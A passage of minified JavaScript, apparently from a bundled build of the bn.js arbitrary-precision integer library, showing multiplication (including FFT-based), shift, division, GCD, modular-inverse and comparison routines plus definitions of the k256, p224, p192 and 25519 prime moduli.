                        c = ((o = o + Math.imul(h, me) | 0) + (i >>> 13) | 0) + (Re >>> 26) | 0, Re &= 67108863, n = Math.imul(D, W), i = (i = Math.imul(D, q)) + Math.imul(j, W) | 0, o = Math.imul(j, q), n = n + Math.imul(k, Q) | 0, i = (i = i + Math.imul(k, K) | 0) + Math.imul(L, Q) | 0, o = o + Math.imul(L, K) | 0, n = n + Math.imul(B, X) | 0, i = (i = i + Math.imul(B, Y) | 0) + Math.imul(N, X) | 0, o = o + Math.imul(N, Y) | 0, n = n + Math.imul(O, $) | 0, i = (i = i + Math.imul(O, ee) | 0) + Math.imul(x, $) | 0, o = o + Math.imul(x, ee) | 0, n = n + Math.imul(I, re) | 0, i = (i = i + Math.imul(I, ne) | 0) + Math.imul(S, re) | 0, o = o + Math.imul(S, ne) | 0, n = n + Math.imul(w, oe) | 0, i = (i = i + Math.imul(w, se) | 0) + Math.imul(T, oe) | 0, o = o + Math.imul(T, se) | 0, n = n + Math.imul(E, ue) | 0, i = (i = i + Math.imul(E, ce) | 0) + Math.imul(A, ue) | 0, o = o + Math.imul(A, ce) | 0, n = n + Math.imul(y, de) | 0, i = (i = i + Math.imul(y, he) | 0) + Math.imul(v, de) | 0, o = o + Math.imul(v, he) | 0;
                        var Ie = (c + (n = n + Math.imul(p, pe) | 0) | 0) + ((8191 & (i = (i = i + Math.imul(p, me) | 0) + Math.imul(m, pe) | 0)) << 13) | 0;
                        c = ((o = o + Math.imul(m, me) | 0) + (i >>> 13) | 0) + (Ie >>> 26) | 0, Ie &= 67108863, n = Math.imul(D, Q), i = (i = Math.imul(D, K)) + Math.imul(j, Q) | 0, o = Math.imul(j, K), n = n + Math.imul(k, X) | 0, i = (i = i + Math.imul(k, Y) | 0) + Math.imul(L, X) | 0, o = o + Math.imul(L, Y) | 0, n = n + Math.imul(B, $) | 0, i = (i = i + Math.imul(B, ee) | 0) + Math.imul(N, $) | 0, o = o + Math.imul(N, ee) | 0, n = n + Math.imul(O, re) | 0, i = (i = i + Math.imul(O, ne) | 0) + Math.imul(x, re) | 0, o = o + Math.imul(x, ne) | 0, n = n + Math.imul(I, oe) | 0, i = (i = i + Math.imul(I, se) | 0) + Math.imul(S, oe) | 0, o = o + Math.imul(S, se) | 0, n = n + Math.imul(w, ue) | 0, i = (i = i + Math.imul(w, ce) | 0) + Math.imul(T, ue) | 0, o = o + Math.imul(T, ce) | 0, n = n + Math.imul(E, de) | 0, i = (i = i + Math.imul(E, he) | 0) + Math.imul(A, de) | 0, o = o + Math.imul(A, he) | 0;
                        var Se = (c + (n = n + Math.imul(y, pe) | 0) | 0) + ((8191 & (i = (i = i + Math.imul(y, me) | 0) + Math.imul(v, pe) | 0)) << 13) | 0;
                        c = ((o = o + Math.imul(v, me) | 0) + (i >>> 13) | 0) + (Se >>> 26) | 0, Se &= 67108863, n = Math.imul(D, X), i = (i = Math.imul(D, Y)) + Math.imul(j, X) | 0, o = Math.imul(j, Y), n = n + Math.imul(k, $) | 0, i = (i = i + Math.imul(k, ee) | 0) + Math.imul(L, $) | 0, o = o + Math.imul(L, ee) | 0, n = n + Math.imul(B, re) | 0, i = (i = i + Math.imul(B, ne) | 0) + Math.imul(N, re) | 0, o = o + Math.imul(N, ne) | 0, n = n + Math.imul(O, oe) | 0, i = (i = i + Math.imul(O, se) | 0) + Math.imul(x, oe) | 0, o = o + Math.imul(x, se) | 0, n = n + Math.imul(I, ue) | 0, i = (i = i + Math.imul(I, ce) | 0) + Math.imul(S, ue) | 0, o = o + Math.imul(S, ce) | 0, n = n + Math.imul(w, de) | 0, i = (i = i + Math.imul(w, he) | 0) + Math.imul(T, de) | 0, o = o + Math.imul(T, he) | 0;
                        var Pe = (c + (n = n + Math.imul(E, pe) | 0) | 0) + ((8191 & (i = (i = i + Math.imul(E, me) | 0) + Math.imul(A, pe) | 0)) << 13) | 0;
                        c = ((o = o + Math.imul(A, me) | 0) + (i >>> 13) | 0) + (Pe >>> 26) | 0, Pe &= 67108863, n = Math.imul(D, $), i = (i = Math.imul(D, ee)) + Math.imul(j, $) | 0, o = Math.imul(j, ee), n = n + Math.imul(k, re) | 0, i = (i = i + Math.imul(k, ne) | 0) + Math.imul(L, re) | 0, o = o + Math.imul(L, ne) | 0, n = n + Math.imul(B, oe) | 0, i = (i = i + Math.imul(B, se) | 0) + Math.imul(N, oe) | 0, o = o + Math.imul(N, se) | 0, n = n + Math.imul(O, ue) | 0, i = (i = i + Math.imul(O, ce) | 0) + Math.imul(x, ue) | 0, o = o + Math.imul(x, ce) | 0, n = n + Math.imul(I, de) | 0, i = (i = i + Math.imul(I, he) | 0) + Math.imul(S, de) | 0, o = o + Math.imul(S, he) | 0;
                        var Oe = (c + (n = n + Math.imul(w, pe) | 0) | 0) + ((8191 & (i = (i = i + Math.imul(w, me) | 0) + Math.imul(T, pe) | 0)) << 13) | 0;
                        c = ((o = o + Math.imul(T, me) | 0) + (i >>> 13) | 0) + (Oe >>> 26) | 0, Oe &= 67108863, n = Math.imul(D, re), i = (i = Math.imul(D, ne)) + Math.imul(j, re) | 0, o = Math.imul(j, ne), n = n + Math.imul(k, oe) | 0, i = (i = i + Math.imul(k, se) | 0) + Math.imul(L, oe) | 0, o = o + Math.imul(L, se) | 0, n = n + Math.imul(B, ue) | 0, i = (i = i + Math.imul(B, ce) | 0) + Math.imul(N, ue) | 0, o = o + Math.imul(N, ce) | 0, n = n + Math.imul(O, de) | 0, i = (i = i + Math.imul(O, he) | 0) + Math.imul(x, de) | 0, o = o + Math.imul(x, he) | 0;
                        var xe = (c + (n = n + Math.imul(I, pe) | 0) | 0) + ((8191 & (i = (i = i + Math.imul(I, me) | 0) + Math.imul(S, pe) | 0)) << 13) | 0;
                        c = ((o = o + Math.imul(S, me) | 0) + (i >>> 13) | 0) + (xe >>> 26) | 0, xe &= 67108863, n = Math.imul(D, oe), i = (i = Math.imul(D, se)) + Math.imul(j, oe) | 0, o = Math.imul(j, se), n = n + Math.imul(k, ue) | 0, i = (i = i + Math.imul(k, ce) | 0) + Math.imul(L, ue) | 0, o = o + Math.imul(L, ce) | 0, n = n + Math.imul(B, de) | 0, i = (i = i + Math.imul(B, he) | 0) + Math.imul(N, de) | 0, o = o + Math.imul(N, he) | 0;
                        var Me = (c + (n = n + Math.imul(O, pe) | 0) | 0) + ((8191 & (i = (i = i + Math.imul(O, me) | 0) + Math.imul(x, pe) | 0)) << 13) | 0;
                        c = ((o = o + Math.imul(x, me) | 0) + (i >>> 13) | 0) + (Me >>> 26) | 0, Me &= 67108863, n = Math.imul(D, ue), i = (i = Math.imul(D, ce)) + Math.imul(j, ue) | 0, o = Math.imul(j, ce), n = n + Math.imul(k, de) | 0, i = (i = i + Math.imul(k, he) | 0) + Math.imul(L, de) | 0, o = o + Math.imul(L, he) | 0;
                        var Be = (c + (n = n + Math.imul(B, pe) | 0) | 0) + ((8191 & (i = (i = i + Math.imul(B, me) | 0) + Math.imul(N, pe) | 0)) << 13) | 0;
                        c = ((o = o + Math.imul(N, me) | 0) + (i >>> 13) | 0) + (Be >>> 26) | 0, Be &= 67108863, n = Math.imul(D, de), i = (i = Math.imul(D, he)) + Math.imul(j, de) | 0, o = Math.imul(j, he);
                        var Ne = (c + (n = n + Math.imul(k, pe) | 0) | 0) + ((8191 & (i = (i = i + Math.imul(k, me) | 0) + Math.imul(L, pe) | 0)) << 13) | 0;
                        c = ((o = o + Math.imul(L, me) | 0) + (i >>> 13) | 0) + (Ne >>> 26) | 0, Ne &= 67108863;
                        var Ce = (c + (n = Math.imul(D, pe)) | 0) + ((8191 & (i = (i = Math.imul(D, me)) + Math.imul(j, pe) | 0)) << 13) | 0;
                        return c = ((o = Math.imul(j, me)) + (i >>> 13) | 0) + (Ce >>> 26) | 0, Ce &= 67108863, u[0] = ge, u[1] = ye, u[2] = ve, u[3] = be, u[4] = Ee, u[5] = Ae, u[6] = _e, u[7] = we, u[8] = Te, u[9] = Re, u[10] = Ie, u[11] = Se, u[12] = Pe, u[13] = Oe, u[14] = xe, u[15] = Me, u[16] = Be, u[17] = Ne, u[18] = Ce, 0 !== c && (u[19] = c, r.length++), r;
                    };
                    function y(e, t, r) {
                        r.negative = t.negative ^ e.negative, r.length = e.length + t.length;
                        for(var n = 0, i = 0, o = 0; o < r.length - 1; o++){
                            var s = i;
                            i = 0;
                            for(var a = 67108863 & n, u = Math.min(o, t.length - 1), c = Math.max(0, o - e.length + 1); c <= u; c++){
                                var l = o - c, d = (0 | e.words[l]) * (0 | t.words[c]), h = 67108863 & d;
                                a = 67108863 & (h = h + a | 0), i += (s = (s = s + (d / 67108864 | 0) | 0) + (h >>> 26) | 0) >>> 26, s &= 67108863;
                            }
                            r.words[o] = a, n = s, s = i;
                        }
                        return 0 !== n ? r.words[o] = n : r.length--, r._strip();
                    }
                    function v(e, t, r) {
                        return y(e, t, r);
                    }
                    function b(e, t) {
                        this.x = e, this.y = t;
                    }
                    Math.imul || (g = m), o.prototype.mulTo = function(e, t) {
                        var r = this.length + e.length;
                        return 10 === this.length && 10 === e.length ? g(this, e, t) : r < 63 ? m(this, e, t) : r < 1024 ? y(this, e, t) : v(this, e, t);
                    }, b.prototype.makeRBT = function(e) {
                        for(var t = new Array(e), r = o.prototype._countBits(e) - 1, n = 0; n < e; n++)t[n] = this.revBin(n, r, e);
                        return t;
                    }, b.prototype.revBin = function(e, t, r) {
                        if (0 === e || e === r - 1) return e;
                        for(var n = 0, i = 0; i < t; i++)n |= (1 & e) << t - i - 1, e >>= 1;
                        return n;
                    }, b.prototype.permute = function(e, t, r, n, i, o) {
                        for(var s = 0; s < o; s++)n[s] = t[e[s]], i[s] = r[e[s]];
                    }, b.prototype.transform = function(e, t, r, n, i, o) {
                        this.permute(o, e, t, r, n, i);
                        for(var s = 1; s < i; s <<= 1)for(var a = s << 1, u = Math.cos(2 * Math.PI / a), c = Math.sin(2 * Math.PI / a), l = 0; l < i; l += a)for(var d = u, h = c, f = 0; f < s; f++){
                            var p = r[l + f], m = n[l + f], g = r[l + f + s], y = n[l + f + s], v = d * g - h * y;
                            y = d * y + h * g, g = v, r[l + f] = p + g, n[l + f] = m + y, r[l + f + s] = p - g, n[l + f + s] = m - y, f !== a && (v = u * d - c * h, h = u * h + c * d, d = v);
                        }
                    }, b.prototype.guessLen13b = function(e, t) {
                        var r = 1 | Math.max(t, e), n = 1 & r, i = 0;
                        for(r = r / 2 | 0; r; r >>>= 1)i++;
                        return 1 << i + 1 + n;
                    }, b.prototype.conjugate = function(e, t, r) {
                        if (!(r <= 1)) for(var n = 0; n < r / 2; n++){
                            var i = e[n];
                            e[n] = e[r - n - 1], e[r - n - 1] = i, i = t[n], t[n] = -t[r - n - 1], t[r - n - 1] = -i;
                        }
                    }, b.prototype.normalize13b = function(e, t) {
                        for(var r = 0, n = 0; n < t / 2; n++){
                            var i = 8192 * Math.round(e[2 * n + 1] / t) + Math.round(e[2 * n] / t) + r;
                            e[n] = 67108863 & i, r = i < 67108864 ? 0 : i / 67108864 | 0;
                        }
                        return e;
                    }, b.prototype.convert13b = function(e, t, r, i) {
                        for(var o = 0, s = 0; s < t; s++)o += 0 | e[s], r[2 * s] = 8191 & o, o >>>= 13, r[2 * s + 1] = 8191 & o, o >>>= 13;
                        for(s = 2 * t; s < i; ++s)r[s] = 0;
                        n(0 === o), n(0 == (-8192 & o));
                    }, b.prototype.stub = function(e) {
                        for(var t = new Array(e), r = 0; r < e; r++)t[r] = 0;
                        return t;
                    }, b.prototype.mulp = function(e, t, r) {
                        var n = 2 * this.guessLen13b(e.length, t.length), i = this.makeRBT(n), o = this.stub(n), s = new Array(n), a = new Array(n), u = new Array(n), c = new Array(n), l = new Array(n), d = new Array(n), h = r.words;
                        h.length = n, this.convert13b(e.words, e.length, s, n), this.convert13b(t.words, t.length, c, n), this.transform(s, o, a, u, n, i), this.transform(c, o, l, d, n, i);
                        for(var f = 0; f < n; f++){
                            var p = a[f] * l[f] - u[f] * d[f];
                            u[f] = a[f] * d[f] + u[f] * l[f], a[f] = p;
                        }
                        return this.conjugate(a, u, n), this.transform(a, u, h, o, n, i), this.conjugate(h, o, n), this.normalize13b(h, n), r.negative = e.negative ^ t.negative, r.length = e.length + t.length, r._strip();
                    }, o.prototype.mul = function(e) {
                        var t = new o(null);
                        return t.words = new Array(this.length + e.length), this.mulTo(e, t);
                    }, o.prototype.mulf = function(e) {
                        var t = new o(null);
                        return t.words = new Array(this.length + e.length), v(this, e, t);
                    }, o.prototype.imul = function(e) {
                        return this.clone().mulTo(e, this);
                    }, o.prototype.imuln = function(e) {
                        var t = e < 0;
                        t && (e = -e), n("number" == typeof e), n(e < 67108864);
                        for(var r = 0, i = 0; i < this.length; i++){
                            var o = (0 | this.words[i]) * e, s = (67108863 & o) + (67108863 & r);
                            r >>= 26, r += o / 67108864 | 0, r += s >>> 26, this.words[i] = 67108863 & s;
                        }
                        return 0 !== r && (this.words[i] = r, this.length++), t ? this.ineg() : this;
                    }, o.prototype.muln = function(e) {
                        return this.clone().imuln(e);
                    }, o.prototype.sqr = function() {
                        return this.mul(this);
                    }, o.prototype.isqr = function() {
                        return this.imul(this.clone());
                    }, o.prototype.pow = function(e) {
                        var t = function(e) {
                            for(var t = new Array(e.bitLength()), r = 0; r < t.length; r++){
                                var n = r / 26 | 0, i = r % 26;
                                t[r] = e.words[n] >>> i & 1;
                            }
                            return t;
                        }(e);
                        if (0 === t.length) return new o(1);
                        for(var r = this, n = 0; n < t.length && 0 === t[n]; n++, r = r.sqr());
                        if (++n < t.length) for(var i = r.sqr(); n < t.length; n++, i = i.sqr())0 !== t[n] && (r = r.mul(i));
                        return r;
                    }, o.prototype.iushln = function(e) {
                        n("number" == typeof e && e >= 0);
                        var t, r = e % 26, i = (e - r) / 26, o = 67108863 >>> 26 - r << 26 - r;
                        if (0 !== r) {
                            var s = 0;
                            for(t = 0; t < this.length; t++){
                                var a = this.words[t] & o, u = (0 | this.words[t]) - a << r;
                                this.words[t] = u | s, s = a >>> 26 - r;
                            }
                            s && (this.words[t] = s, this.length++);
                        }
                        if (0 !== i) {
                            for(t = this.length - 1; t >= 0; t--)this.words[t + i] = this.words[t];
                            for(t = 0; t < i; t++)this.words[t] = 0;
                            this.length += i;
                        }
                        return this._strip();
                    }, o.prototype.ishln = function(e) {
                        return n(0 === this.negative), this.iushln(e);
                    }, o.prototype.iushrn = function(e, t, r) {
                        var i;
                        n("number" == typeof e && e >= 0), i = t ? (t - t % 26) / 26 : 0;
                        var o = e % 26, s = Math.min((e - o) / 26, this.length), a = 67108863 ^ 67108863 >>> o << o, u = r;
                        if (i -= s, i = Math.max(0, i), u) {
                            for(var c = 0; c < s; c++)u.words[c] = this.words[c];
                            u.length = s;
                        }
                        if (0 === s) ;
                        else if (this.length > s) for(this.length -= s, c = 0; c < this.length; c++)this.words[c] = this.words[c + s];
                        else this.words[0] = 0, this.length = 1;
                        var l = 0;
                        for(c = this.length - 1; c >= 0 && (0 !== l || c >= i); c--){
                            var d = 0 | this.words[c];
                            this.words[c] = l << 26 - o | d >>> o, l = d & a;
                        }
                        return u && 0 !== l && (u.words[u.length++] = l), 0 === this.length && (this.words[0] = 0, this.length = 1), this._strip();
                    }, o.prototype.ishrn = function(e, t, r) {
                        return n(0 === this.negative), this.iushrn(e, t, r);
                    }, o.prototype.shln = function(e) {
                        return this.clone().ishln(e);
                    }, o.prototype.ushln = function(e) {
                        return this.clone().iushln(e);
                    }, o.prototype.shrn = function(e) {
                        return this.clone().ishrn(e);
                    }, o.prototype.ushrn = function(e) {
                        return this.clone().iushrn(e);
                    }, o.prototype.testn = function(e) {
                        n("number" == typeof e && e >= 0);
                        var t = e % 26, r = (e - t) / 26, i = 1 << t;
                        return !(this.length <= r || !(this.words[r] & i));
                    }, o.prototype.imaskn = function(e) {
                        n("number" == typeof e && e >= 0);
                        var t = e % 26, r = (e - t) / 26;
                        if (n(0 === this.negative, "imaskn works only with positive numbers"), this.length <= r) return this;
                        if (0 !== t && r++, this.length = Math.min(r, this.length), 0 !== t) {
                            var i = 67108863 ^ 67108863 >>> t << t;
                            this.words[this.length - 1] &= i;
                        }
                        return this._strip();
                    }, o.prototype.maskn = function(e) {
                        return this.clone().imaskn(e);
                    }, o.prototype.iaddn = function(e) {
                        return n("number" == typeof e), n(e < 67108864), e < 0 ? this.isubn(-e) : 0 !== this.negative ? 1 === this.length && (0 | this.words[0]) <= e ? (this.words[0] = e - (0 | this.words[0]), this.negative = 0, this) : (this.negative = 0, this.isubn(e), this.negative = 1, this) : this._iaddn(e);
                    }, o.prototype._iaddn = function(e) {
                        this.words[0] += e;
                        for(var t = 0; t < this.length && this.words[t] >= 67108864; t++)this.words[t] -= 67108864, t === this.length - 1 ? this.words[t + 1] = 1 : this.words[t + 1]++;
                        return this.length = Math.max(this.length, t + 1), this;
                    }, o.prototype.isubn = function(e) {
                        if (n("number" == typeof e), n(e < 67108864), e < 0) return this.iaddn(-e);
                        if (0 !== this.negative) return this.negative = 0, this.iaddn(e), this.negative = 1, this;
                        if (this.words[0] -= e, 1 === this.length && this.words[0] < 0) this.words[0] = -this.words[0], this.negative = 1;
                        else for(var t = 0; t < this.length && this.words[t] < 0; t++)this.words[t] += 67108864, this.words[t + 1] -= 1;
                        return this._strip();
                    }, o.prototype.addn = function(e) {
                        return this.clone().iaddn(e);
                    }, o.prototype.subn = function(e) {
                        return this.clone().isubn(e);
                    }, o.prototype.iabs = function() {
                        return this.negative = 0, this;
                    }, o.prototype.abs = function() {
                        return this.clone().iabs();
                    }, o.prototype._ishlnsubmul = function(e, t, r) {
                        var i, o, s = e.length + r;
                        this._expand(s);
                        var a = 0;
                        for(i = 0; i < e.length; i++){
                            o = (0 | this.words[i + r]) + a;
                            var u = (0 | e.words[i]) * t;
                            a = ((o -= 67108863 & u) >> 26) - (u / 67108864 | 0), this.words[i + r] = 67108863 & o;
                        }
                        for(; i < this.length - r; i++)a = (o = (0 | this.words[i + r]) + a) >> 26, this.words[i + r] = 67108863 & o;
                        if (0 === a) return this._strip();
                        for(n(-1 === a), a = 0, i = 0; i < this.length; i++)a = (o = -(0 | this.words[i]) + a) >> 26, this.words[i] = 67108863 & o;
                        return this.negative = 1, this._strip();
                    }, o.prototype._wordDiv = function(e, t) {
                        var r = (this.length, e.length), n = this.clone(), i = e, s = 0 | i.words[i.length - 1];
                        0 != (r = 26 - this._countBits(s)) && (i = i.ushln(r), n.iushln(r), s = 0 | i.words[i.length - 1]);
                        var a, u = n.length - i.length;
                        if ("mod" !== t) {
                            (a = new o(null)).length = u + 1, a.words = new Array(a.length);
                            for(var c = 0; c < a.length; c++)a.words[c] = 0;
                        }
                        var l = n.clone()._ishlnsubmul(i, 1, u);
                        0 === l.negative && (n = l, a && (a.words[u] = 1));
                        for(var d = u - 1; d >= 0; d--){
                            var h = 67108864 * (0 | n.words[i.length + d]) + (0 | n.words[i.length + d - 1]);
                            for(h = Math.min(h / s | 0, 67108863), n._ishlnsubmul(i, h, d); 0 !== n.negative;)h--, n.negative = 0, n._ishlnsubmul(i, 1, d), n.isZero() || (n.negative ^= 1);
                            a && (a.words[d] = h);
                        }
                        return a && a._strip(), n._strip(), "div" !== t && 0 !== r && n.iushrn(r), {
                            div: a || null,
                            mod: n
                        };
                    }, o.prototype.divmod = function(e, t, r) {
                        var i, s, a;
                        return n(!e.isZero()), this.isZero() ? {
                            div: new o(0),
                            mod: new o(0)
                        } : 0 !== this.negative && 0 === e.negative ? (a = this.neg().divmod(e, t), "mod" !== t && (i = a.div.neg()), "div" !== t && (s = a.mod.neg(), r && 0 !== s.negative && s.iadd(e)), {
                            div: i,
                            mod: s
                        }) : 0 === this.negative && 0 !== e.negative ? (a = this.divmod(e.neg(), t), "mod" !== t && (i = a.div.neg()), {
                            div: i,
                            mod: a.mod
                        }) : 0 != (this.negative & e.negative) ? (a = this.neg().divmod(e.neg(), t), "div" !== t && (s = a.mod.neg(), r && 0 !== s.negative && s.isub(e)), {
                            div: a.div,
                            mod: s
                        }) : e.length > this.length || this.cmp(e) < 0 ? {
                            div: new o(0),
                            mod: this
                        } : 1 === e.length ? "div" === t ? {
                            div: this.divn(e.words[0]),
                            mod: null
                        } : "mod" === t ? {
                            div: null,
                            mod: new o(this.modrn(e.words[0]))
                        } : {
                            div: this.divn(e.words[0]),
                            mod: new o(this.modrn(e.words[0]))
                        } : this._wordDiv(e, t);
                    }, o.prototype.div = function(e) {
                        return this.divmod(e, "div", !1).div;
                    }, o.prototype.mod = function(e) {
                        return this.divmod(e, "mod", !1).mod;
                    }, o.prototype.umod = function(e) {
                        return this.divmod(e, "mod", !0).mod;
                    }, o.prototype.divRound = function(e) {
                        var t = this.divmod(e);
                        if (t.mod.isZero()) return t.div;
                        var r = 0 !== t.div.negative ? t.mod.isub(e) : t.mod, n = e.ushrn(1), i = e.andln(1), o = r.cmp(n);
                        return o < 0 || 1 === i && 0 === o ? t.div : 0 !== t.div.negative ? t.div.isubn(1) : t.div.iaddn(1);
                    }, o.prototype.modrn = function(e) {
                        var t = e < 0;
                        t && (e = -e), n(e <= 67108863);
                        for(var r = 67108864 % e, i = 0, o = this.length - 1; o >= 0; o--)i = (r * i + (0 | this.words[o])) % e;
                        return t ? -i : i;
                    }, o.prototype.modn = function(e) {
                        return this.modrn(e);
                    }, o.prototype.idivn = function(e) {
                        var t = e < 0;
                        t && (e = -e), n(e <= 67108863);
                        for(var r = 0, i = this.length - 1; i >= 0; i--){
                            var o = (0 | this.words[i]) + 67108864 * r;
                            this.words[i] = o / e | 0, r = o % e;
                        }
                        return this._strip(), t ? this.ineg() : this;
                    }, o.prototype.divn = function(e) {
                        return this.clone().idivn(e);
                    }, o.prototype.egcd = function(e) {
                        n(0 === e.negative), n(!e.isZero());
                        var t = this, r = e.clone();
                        t = 0 !== t.negative ? t.umod(e) : t.clone();
                        for(var i = new o(1), s = new o(0), a = new o(0), u = new o(1), c = 0; t.isEven() && r.isEven();)t.iushrn(1), r.iushrn(1), ++c;
                        for(var l = r.clone(), d = t.clone(); !t.isZero();){
                            for(var h = 0, f = 1; 0 == (t.words[0] & f) && h < 26; ++h, f <<= 1);
                            if (h > 0) for(t.iushrn(h); h-- > 0;)(i.isOdd() || s.isOdd()) && (i.iadd(l), s.isub(d)), i.iushrn(1), s.iushrn(1);
                            for(var p = 0, m = 1; 0 == (r.words[0] & m) && p < 26; ++p, m <<= 1);
                            if (p > 0) for(r.iushrn(p); p-- > 0;)(a.isOdd() || u.isOdd()) && (a.iadd(l), u.isub(d)), a.iushrn(1), u.iushrn(1);
                            t.cmp(r) >= 0 ? (t.isub(r), i.isub(a), s.isub(u)) : (r.isub(t), a.isub(i), u.isub(s));
                        }
                        return {
                            a: a,
                            b: u,
                            gcd: r.iushln(c)
                        };
                    }, o.prototype._invmp = function(e) {
                        n(0 === e.negative), n(!e.isZero());
                        var t = this, r = e.clone();
                        t = 0 !== t.negative ? t.umod(e) : t.clone();
                        for(var i, s = new o(1), a = new o(0), u = r.clone(); t.cmpn(1) > 0 && r.cmpn(1) > 0;){
                            for(var c = 0, l = 1; 0 == (t.words[0] & l) && c < 26; ++c, l <<= 1);
                            if (c > 0) for(t.iushrn(c); c-- > 0;)s.isOdd() && s.iadd(u), s.iushrn(1);
                            for(var d = 0, h = 1; 0 == (r.words[0] & h) && d < 26; ++d, h <<= 1);
                            if (d > 0) for(r.iushrn(d); d-- > 0;)a.isOdd() && a.iadd(u), a.iushrn(1);
                            t.cmp(r) >= 0 ? (t.isub(r), s.isub(a)) : (r.isub(t), a.isub(s));
                        }
                        return (i = 0 === t.cmpn(1) ? s : a).cmpn(0) < 0 && i.iadd(e), i;
                    }, o.prototype.gcd = function(e) {
                        if (this.isZero()) return e.abs();
                        if (e.isZero()) return this.abs();
                        var t = this.clone(), r = e.clone();
                        t.negative = 0, r.negative = 0;
                        for(var n = 0; t.isEven() && r.isEven(); n++)t.iushrn(1), r.iushrn(1);
                        for(;;){
                            for(; t.isEven();)t.iushrn(1);
                            for(; r.isEven();)r.iushrn(1);
                            var i = t.cmp(r);
                            if (i < 0) {
                                var o = t;
                                t = r, r = o;
                            } else if (0 === i || 0 === r.cmpn(1)) break;
                            t.isub(r);
                        }
                        return r.iushln(n);
                    }, o.prototype.invm = function(e) {
                        return this.egcd(e).a.umod(e);
                    }, o.prototype.isEven = function() {
                        return 0 == (1 & this.words[0]);
                    }, o.prototype.isOdd = function() {
                        return 1 == (1 & this.words[0]);
                    }, o.prototype.andln = function(e) {
                        return this.words[0] & e;
                    }, o.prototype.bincn = function(e) {
                        n("number" == typeof e);
                        var t = e % 26, r = (e - t) / 26, i = 1 << t;
                        if (this.length <= r) return this._expand(r + 1), this.words[r] |= i, this;
                        for(var o = i, s = r; 0 !== o && s < this.length; s++){
                            var a = 0 | this.words[s];
                            o = (a += o) >>> 26, a &= 67108863, this.words[s] = a;
                        }
                        return 0 !== o && (this.words[s] = o, this.length++), this;
                    }, o.prototype.isZero = function() {
                        return 1 === this.length && 0 === this.words[0];
                    }, o.prototype.cmpn = function(e) {
                        var t, r = e < 0;
                        if (0 !== this.negative && !r) return -1;
                        if (0 === this.negative && r) return 1;
                        if (this._strip(), this.length > 1) t = 1;
                        else {
                            r && (e = -e), n(e <= 67108863, "Number is too big");
                            var i = 0 | this.words[0];
                            t = i === e ? 0 : i < e ? -1 : 1;
                        }
                        return 0 !== this.negative ? 0 | -t : t;
                    }, o.prototype.cmp = function(e) {
                        if (0 !== this.negative && 0 === e.negative) return -1;
                        if (0 === this.negative && 0 !== e.negative) return 1;
                        var t = this.ucmp(e);
                        return 0 !== this.negative ? 0 | -t : t;
                    }, o.prototype.ucmp = function(e) {
                        if (this.length > e.length) return 1;
                        if (this.length < e.length) return -1;
                        for(var t = 0, r = this.length - 1; r >= 0; r--){
                            var n = 0 | this.words[r], i = 0 | e.words[r];
                            if (n !== i) {
                                n < i ? t = -1 : n > i && (t = 1);
                                break;
                            }
                        }
                        return t;
                    }, o.prototype.gtn = function(e) {
                        return 1 === this.cmpn(e);
                    }, o.prototype.gt = function(e) {
                        return 1 === this.cmp(e);
                    }, o.prototype.gten = function(e) {
                        return this.cmpn(e) >= 0;
                    }, o.prototype.gte = function(e) {
                        return this.cmp(e) >= 0;
                    }, o.prototype.ltn = function(e) {
                        return -1 === this.cmpn(e);
                    }, o.prototype.lt = function(e) {
                        return -1 === this.cmp(e);
                    }, o.prototype.lten = function(e) {
                        return this.cmpn(e) <= 0;
                    }, o.prototype.lte = function(e) {
                        return this.cmp(e) <= 0;
                    }, o.prototype.eqn = function(e) {
                        return 0 === this.cmpn(e);
                    }, o.prototype.eq = function(e) {
                        return 0 === this.cmp(e);
                    }, o.red = function(e) {
                        return new I(e);
                    }, o.prototype.toRed = function(e) {
                        return n(!this.red, "Already a number in reduction context"), n(0 === this.negative, "red works only with positives"), e.convertTo(this)._forceRed(e);
                    }, o.prototype.fromRed = function() {
                        return n(this.red, "fromRed works only with numbers in reduction context"), this.red.convertFrom(this);
                    }, o.prototype._forceRed = function(e) {
                        return this.red = e, this;
                    }, o.prototype.forceRed = function(e) {
                        return n(!this.red, "Already a number in reduction context"), this._forceRed(e);
                    }, o.prototype.redAdd = function(e) {
                        return n(this.red, "redAdd works only with red numbers"), this.red.add(this, e);
                    }, o.prototype.redIAdd = function(e) {
                        return n(this.red, "redIAdd works only with red numbers"), this.red.iadd(this, e);
                    }, o.prototype.redSub = function(e) {
                        return n(this.red, "redSub works only with red numbers"), this.red.sub(this, e);
                    }, o.prototype.redISub = function(e) {
                        return n(this.red, "redISub works only with red numbers"), this.red.isub(this, e);
                    }, o.prototype.redShl = function(e) {
                        return n(this.red, "redShl works only with red numbers"), this.red.shl(this, e);
                    }, o.prototype.redMul = function(e) {
                        return n(this.red, "redMul works only with red numbers"), this.red._verify2(this, e), this.red.mul(this, e);
                    }, o.prototype.redIMul = function(e) {
                        return n(this.red, "redMul works only with red numbers"), this.red._verify2(this, e), this.red.imul(this, e);
                    }, o.prototype.redSqr = function() {
                        return n(this.red, "redSqr works only with red numbers"), this.red._verify1(this), this.red.sqr(this);
                    }, o.prototype.redISqr = function() {
                        return n(this.red, "redISqr works only with red numbers"), this.red._verify1(this), this.red.isqr(this);
                    }, o.prototype.redSqrt = function() {
                        return n(this.red, "redSqrt works only with red numbers"), this.red._verify1(this), this.red.sqrt(this);
                    }, o.prototype.redInvm = function() {
                        return n(this.red, "redInvm works only with red numbers"), this.red._verify1(this), this.red.invm(this);
                    }, o.prototype.redNeg = function() {
                        return n(this.red, "redNeg works only with red numbers"), this.red._verify1(this), this.red.neg(this);
                    }, o.prototype.redPow = function(e) {
                        return n(this.red && !e.red, "redPow(normalNum)"), this.red._verify1(this), this.red.pow(this, e);
                    };
                    var E = {
                        k256: null,
                        p224: null,
                        p192: null,
                        p25519: null
                    };
                    function A(e, t) {
                        this.name = e, this.p = new o(t, 16), this.n = this.p.bitLength(), this.k = new o(1).iushln(this.n).isub(this.p), this.tmp = this._tmp();
                    }
                    function _() {
                        A.call(this, "k256", "ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff fffffffe fffffc2f");
                    }
                    function w() {
                        A.call(this, "p224", "ffffffff ffffffff ffffffff ffffffff 00000000 00000000 00000001");
                    }
                    function T() {
                        A.call(this, "p192", "ffffffff ffffffff ffffffff fffffffe ffffffff ffffffff");
                    }
                    function R() {
                        A.call(this, "25519", "7fffffffffffffff ffffffffffffffff ffffffffffffffff ffffffffffffffed");
                    }
                    function I(e) {
                        if ("string" == typeof e) {
                            var t = o._prime(e);
                            this.m = t.p, this.prime = t;
                        } else n(e.gtn(1), "modulus must be greater than 1"), this.m = e, this.prime = null;
                    }
                    function S(e) {
